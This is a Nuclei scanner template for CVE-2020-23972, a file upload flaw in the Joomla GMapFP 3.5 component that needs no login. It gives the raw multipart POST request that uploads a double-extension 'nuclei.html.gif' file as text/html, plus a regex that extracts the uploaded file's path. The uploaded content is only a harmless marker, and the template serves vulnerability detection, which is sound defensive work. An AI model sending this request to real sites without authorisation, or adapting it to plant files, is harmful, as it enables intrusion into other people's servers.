id: CVE-2020-23972 info: name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload author: dwisiswant0 severity: high description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. reference: - https://www.exploit-db.com/exploits/49129 - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 epss-score: 0.68335 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 framework: joomla\! vendor: gmapfp product: gmapfp tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive http: - raw: - | POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} Connection: close ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="option" com_gmapfp ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif" Content-Type: text/html projectdiscovery ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="no_html" no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- payloads: component: - "com_gmapfp" - "comgmapfp" extractors: - type: regex regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" part: body